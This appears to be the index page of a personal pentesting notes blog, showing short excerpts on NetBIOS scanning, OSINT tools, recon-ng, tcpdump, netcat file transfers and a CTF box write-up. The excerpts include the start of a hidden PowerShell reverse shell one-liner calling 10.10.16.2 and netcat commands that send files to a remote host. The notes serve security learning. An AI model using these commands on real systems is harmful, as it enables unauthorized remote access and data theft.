Shuciran Pentesting Notes

NETBIOS (tcp-139)

NBTSCAN nbtscan -r 10.11.1.0/24

Social Media

Social-Searcher Useful resource to gather info from several social networks: Social-Searcher Twofi Scans a user’s Twitter feed and generates a personalized wordlist used for password attacks again...

Recon-ng

To get started, let’s simply run recon-ng: kali@kali:~$ recon-ng [*] Version check disabled. /\ / \\ /\ Spon...

Domain Enumeration Gathering

Security Headers Analyze HTTP response headers and provide basic analysis of the target site’s security posture Security Headers SSL Server Test Analyzes a server’s SSL/TLS configuration and compa...

PowerShell Reverse Shell

Reverse Shell powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("10.10.16.2", 1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($...

Tcpdump

Read a pcap -r read a file sudo tcpdump -r password_cracking_filtered.pcap Capture traffic -i choose interface sudo tcpdump -i tun0 icmp Filter by src/dst host tcpdump -n <src/dst> host 1...

Netcat File Transfer

Transfer File Send the contents of the file towards the netcat listener on the victim machine: type .\out.txt | .\nc.exe -nv 10.10.16.2 443 Then redirect the traffic towards the destination file: nc...

Netcat File Transfer

Transfer File Send the contents of the file towards the netcat listener on the victim machine: nc -nv 10.11.0.22 4444 < /usr/share/windows-resources/binaries/wget.exe Then redirect the traffic to...

Common Commands

mkdir mkdir -p {content,exploits,nmap} Reload zsh Useful command to reload zsh when it is modified (alias, keys, etc.): source ~/.zshrc Pyenv pyenv install <version> pyenv versions pyenv gl...

Epsilon (Medium)

Content Git Source retrieve with GitHacker AWS Enumeration Lambda Function Enumeration Authentication Bypass Abusing JWT Server Side Template Injection (SSTI) Tar Symlink Exploitati...